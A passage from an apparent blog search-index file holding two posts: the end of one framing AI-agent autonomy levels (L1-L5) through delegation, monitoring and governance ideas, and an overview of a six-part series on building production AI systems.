hence governance This metaphor explains why animal intuitions fail. A dog learns from consequences. A ghost learns from training data that may be years old.\nThe Delegation Perspective (Principal-Agent Theory) Organizational theory has a framework for granting authority to entities that may not share your goals: principal-agent relationships.\nThe principal (user) delegates to an agent (AI) with:\nBounded authority \u2014 what it can and cannot do Monitoring mechanisms \u2014 observability and audit trails Incentive alignment \u2014 objectives that match user intent This lens explains why autonomy levels map to accountability structures. Higher autonomy requires stronger monitoring, clearer boundaries, and better alignment verification.\nThe Stance Perspective (Dennett) Philosopher Daniel Dennett&rsquo;s &ldquo;intentional stance&rdquo;: we can usefully describe AI behavior using goal-directed language (&ldquo;it wants,&rdquo; &ldquo;it believes&rdquo;) as functional predictions, without claiming genuine mental states.\nThis matters because it lets us reason about agent behavior pragmatically while remaining agnostic about consciousness. The L1-L5 framework defines how much we rely on the intentional stance versus direct supervision.\nThe Robotics Perspective (Sheridan, NIST) Sheridan and Wickens&rsquo; 10-level model (1978) defined autonomy from &ldquo;human does everything&rdquo; to &ldquo;computer does everything and ignores human.&rdquo; NIST&rsquo;s ALFUS framework adds nuance: autonomy isn&rsquo;t one number; it&rsquo;s three axes:\nHuman independence \u2014 how much oversight is required Mission complexity \u2014 how difficult the task Environmental difficulty \u2014 how unpredictable the context A system might be highly autonomous for simple tasks in stable environments, but require heavy oversight for complex tasks in chaotic ones.\nSynthesis: What the L1-L5 Framework Captures Robotics taught us autonomy is multi-dimensional. Organization theory taught us delegation requires accountability structures. Philosophy taught us we can model agents functionally without metaphysical claims. Karpathy&rsquo;s ghost metaphor reminds us why animal intuitions fail.\nThe L1-L5 framework integrates these insights. Each level defines not just capability but:\nDelegation boundaries \u2014 what decisions the AI can make alone Monitoring requirements \u2014 what observability infrastructure you need Accountability structures \u2014 who is responsible when things go wrong L3 isn&rsquo;t &ldquo;the agent is smarter&rdquo;; it&rsquo;s &ldquo;we&rsquo;ve built sufficient verification and governance to extend bounded authority.&rdquo;\nThe Infrastructure Implication Each autonomy level requires specific infrastructure:\nLevel Critical Infrastructure L1 Latency (fast suggestions) L2 Context (knows what you&rsquo;re working on) L3 Verification (catches errors before execution) L4 Governance (policy enforcement at runtime) L5 All of the above, plus observability for audit You can&rsquo;t safely climb the ladder without building the rungs.\nNext: Building the Infrastructure This framework defines the destination: safe, accountable autonomy at whatever level your product requires.\nParts 1-4 are the engineering manual for getting there. Each layer of infrastructure unlocks higher levels of the autonomy ladder.\nStart with Part 1: Architecture \u2192\nSources Autonomy Frameworks\nLevels of Autonomy for AI Agents (Knight Institute) \u2014 L1-L5 framework Humans and Automation (Sheridan &amp; Wickens) \u2014 10-level taxonomy from robotics ALFUS Framework (NIST) \u2014 3-axis autonomy model Mental Models\nAnimals vs Ghosts (Karpathy) \u2014 LLMs as summoned ghosts The Intentional Stance (Dennett) \u2014 Functional agency A Call for Collaborative Intelligence \u2014 Human-Agent Systems over autonomy-first design Navigation Series Index | Part 1: Architecture \u2192\nPart of a 6-part series on building production AI systems.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-part0-autonomy-ladder\/","summary":"Before you build: the mental models for human-AI collaboration. Why L1 copilots need different infrastructure than L4 autonomous agents.","title":"Model-Adjacent Products, Pre-Read: The Autonomy Ladder"},{"content":"Think of the foundation model as the CPU; your product is the computer you build around it.\nIn the tooling era, the consumer was human: better interfaces, better workflows, better collaboration for people. Now the consumer is often the model itself. Tokens, verifiers, labs, simulators, context managers, memory systems; these aren&rsquo;t just more AI. They&rsquo;re the cognition infrastructure built to augment what models can do, paper over what they can&rsquo;t, and govern what they shouldn&rsquo;t.\nProducts are being built around what sits next to the model. A new class of model-adjacent products.\nThe Series This 6-part series covers what that computer looks like, and how to build it safely.\nPre-Read: The Autonomy Ladder Before you build: the mental models for human-AI collaboration. Why L1 copilots need different infrastructure than L4 autonomous agents.\nPart 1: Architecture The physics of production AI: latency engineering that keeps humans in the loop. Token economics that don&rsquo;t bankrupt you.\nPart 2: Context &amp; Tools Memory and hands for the model: retrieval that doesn&rsquo;t hallucinate. Tools that don&rsquo;t break production.\nPart 3: Quality Gates Model outputs are hypotheses that need verification pipelines to catch errors before users do.\nPart 4: Governance &amp; Practice Alignment as a runtime surface, policy enforcement without retraining. Team practices that ship.\nPart 5: The Implementation Path The build manifest: 90 days from foundation to production.\nWho This Is For Engineering leaders and product managers building AI-first products. You&rsquo;ve moved past &ldquo;which model?&rdquo; to &ldquo;what do I build around it?&rdquo;\nKey Influences This series synthesizes research from Karpathy (verifiability, ghosts vs animals), Knight Institute (autonomy levels), OWASP (agentic security), and production patterns from 2025-2026.\nStart with The Autonomy Ladder to understand the framework, or jump to Part 1: Architecture if you&rsquo;re ready to build.\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-adjacent-series\/","summary":"A 6-part series on building production AI systems. The foundation model is the CPU; your product is the computer you build around it.","title":"Model-Adjacent Products: A Builder's Guide"}]